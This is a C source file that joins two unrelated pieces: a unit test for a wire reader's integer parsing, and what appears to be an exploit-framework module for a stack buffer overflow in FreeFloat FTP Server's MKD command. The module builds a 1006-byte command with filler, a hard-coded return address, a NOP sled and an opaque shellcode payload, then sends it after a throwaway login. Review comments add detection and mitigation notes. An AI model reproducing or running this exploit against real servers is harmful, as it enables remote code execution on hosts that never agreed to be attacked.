// Exercises wire_reader_t's fixed-width signed integer readers (int8/int16/int32/int64)
// against known hex fixtures.
//
// What the expectations pin down (assuming unhexify yields bytes in textual order):
//   - multi-byte values are read most-significant byte first (AA FF -> 0xAAFF);
//   - results are signed, so a byte of 0xFF reads back as -1 rather than 255.
//
// NOTE(review): every fixture here is exactly as long as the reads performed on it.
// Nothing in this test covers a read that runs past the end of the buffer, which is
// the case that matters most when the bytes come from an untrusted peer. Worth a
// separate test once the intended failure mode is confirmed.
TEST(wire_reader_t, ints) {
    // Two back-to-back single-byte reads from one buffer: 0x7F, then 0xFF.
    auto wire = make_buff(unhexify("7FFF"));
    wire_reader_t rd(wire.get());
    ASSERT_EQ(127, rd.int8());
    ASSERT_EQ(-1, rd.int8());

    // 16-bit read; the expected value has its top bit set, so it is negative.
    wire = make_buff(unhexify("AAFF"));
    rd = wire_reader_t(wire.get());
    const int16_t want16 = static_cast<int16_t>(0xAAFF);
    ASSERT_EQ(want16, rd.int16());

    // 32-bit read, again with the sign bit set.
    wire = make_buff(unhexify("ABCD0123"));
    rd = wire_reader_t(wire.get());
    const int32_t want32 = static_cast<int32_t>(0xABCD0123);
    ASSERT_EQ(want32, rd.int32());

    // 64-bit read of a positive value.
    wire = make_buff(unhexify("0123456789ABCDEF"));
    rd = wire_reader_t(wire.get());
    ASSERT_EQ(0x0123456789ABCDEF, rd.int64());
}
/*
 * Module entry point: logs in to an FTP service and sends one oversized MKD command.
 *
 * The command is a fixed 1006-byte buffer laid out as
 *   "MKD " | 247 filler bytes ('A') | 4 fixed bytes | 0x90 padding | payload | "\r\n"
 * which is the shape of a classic stack-overflow proof of concept against a server
 * that copies the MKD argument without a length check (presumably; the server side
 * is not visible here).
 *
 * Defender's view of the same traffic: an FTP MKD argument of roughly 1000 bytes,
 * long runs of 0x41 and 0x90, and non-printable bytes inside a path argument are all
 * cheap, high-signal things to alert on. Limiting FTP command-argument length at a
 * proxy, enabling DEP/ASLR on the host, and patching or retiring the affected server
 * are the corresponding mitigations.
 *
 * module: framework module descriptor; only module->target.offset is read, and only
 *         to print it.
 * Returns a null pointer (the literal 0) on every path.
 *
 * NOTE(review): none of the return values of tcp_socket_connect, make_buff, memcat
 * or tcp_send_recv are checked, and sock_fd is never closed in this function.
 */
void *freefloat_ftp_server_mkd_exploit(struct module_t *module)
{
    struct module_t *self;
    int sock_fd;
    char buffer[1024];          /* receive buffer handed to the tcp_* helpers */
    char attack_string[1006];   /* the complete MKD command line, CRLF included */
    char *sc;
    int space;
    int offset;                 /* running write position, advanced via memcat's &offset */
    char *junk;
    char *nops;

    offset = 0;
    space = 0;
    self = module;

    /* NOTE(review): target.offset is printed but the layout below uses the literal 247;
     * confirm whether the two are meant to be the same value. */
    print_error("self.offset = %d", self->target.offset);

    memset(&buffer, 0, 1024);
    /* Hard-coded until a proper options mechanism exists. The address is in RFC 1918
     * private space (10.0.0.0/8), i.e. a lab host rather than an Internet target. */
    sock_fd = tcp_socket_connect("10.69.69.208", "21", buffer, 1024);

    /* Pre-fill with 0x90; the memcat calls below are sized to overwrite all 1006 bytes. */
    memset(&attack_string, '\x90', 1006);

    /* Opaque machine-code payload. What it does cannot be determined from this listing;
     * treat it as untrusted. Its length is taken with strlen(), so the construction
     * relies on the payload containing no NUL bytes. */
    sc = "\xba\x46\x14\xf5\x8a\xda\xc8\xd9\x74\x24\xf4\x5e\x2b\xc9"
         "\xb1\x33\x83\xee\xfc\x31\x56\x0e\x03\x10\x1a\x17\x7f\x60"
         "\xca\x5e\x80\x98\x0b\x01\x08\x7d\x3a\x13\x6e\xf6\x6f\xa3"
         "\xe4\x5a\x9c\x48\xa8\x4e\x17\x3c\x65\x61\x90\x8b\x53\x4c"
         "\x21\x3a\x5c\x02\xe1\x5c\x20\x58\x36\xbf\x19\x93\x4b\xbe"
         "\x5e\xc9\xa4\x92\x37\x86\x17\x03\x33\xda\xab\x22\x93\x51"
         "\x93\x5c\x96\xa5\x60\xd7\x99\xf5\xd9\x6c\xd1\xed\x52\x2a"
         "\xc2\x0c\xb6\x28\x3e\x47\xb3\x9b\xb4\x56\x15\xd2\x35\x69"
         "\x59\xb9\x0b\x46\x54\xc3\x4c\x60\x87\xb6\xa6\x93\x3a\xc1"
         "\x7c\xee\xe0\x44\x61\x48\x62\xfe\x41\x69\xa7\x99\x02\x65"
         "\x0c\xed\x4d\x69\x93\x22\xe6\x95\x18\xc5\x29\x1c\x5a\xe2"
         "\xed\x45\x38\x8b\xb4\x23\xef\xb4\xa7\x8b\x50\x11\xa3\x39"
         "\x84\x23\xee\x57\x5b\xa1\x94\x1e\x5b\xb9\x96\x30\x34\x88"
         "\x1d\xdf\x43\x15\xf4\xa4\xbc\x5f\x55\x8c\x54\x06\x0f\x8d"
         "\x38\xb9\xe5\xd1\x44\x3a\x0c\xa9\xb2\x22\x65\xac\xff\xe4"
         "\x95\xdc\x90\x80\x99\x73\x90\x80\xf9\x12\x02\x48\xd0\xb1"
         "\xa2\xeb\x2c";

    /* Total size - addrlen - offset - payload_len - 'MKD ' - 2 for \r\n
     * NOTE(review): the arithmetic mixes int literals with strlen()'s size_t, so a
     * payload longer than the remaining room would wrap instead of going negative;
     * the result is not range-checked before it reaches make_buff. */
    space = (1006 - 4 - 247 - strlen(sc) - 4 - 2);

    /* Heap-allocated fill runs (freed at the end of the function). */
    junk = make_buff('A', 247);
    nops = make_buff('\x90', space);

    /* Assemble the command in order; each call appends at `offset`. */
    memcat(attack_string, 1006, &offset, "MKD ", 4);
    memcat(attack_string, 1006, &offset, junk, 247);
    /* Four fixed bytes placed immediately after the filler; presumably the value that
     * lands on saved control data in the target (TODO confirm). A constant like this
     * only holds where the target's modules load at predictable addresses, which is
     * what ASLR removes. */
    memcat(attack_string, 1006, &offset, "\xEF\x31\x9D\x7C", 4);
    memcat(attack_string, 1006, &offset, nops, space);
    memcat(attack_string, 1006, &offset, sc, strlen(sc));
    memcat(attack_string, 1006, &offset, "\r\n", 2);

    /* Throwaway credentials, then the oversized command. A server that accepts
     * arbitrary or anonymous logins exposes MKD to unauthenticated peers. */
    tcp_send_recv(sock_fd, "USER wtf\r\n", 11, buffer, 1024);
    tcp_send_recv(sock_fd, "PASS wtf\r\n", 11, buffer, 1024);
    tcp_send_recv(sock_fd, attack_string, 1006, buffer, 1024);

    free(junk);
    free(nops);

    return 0;
}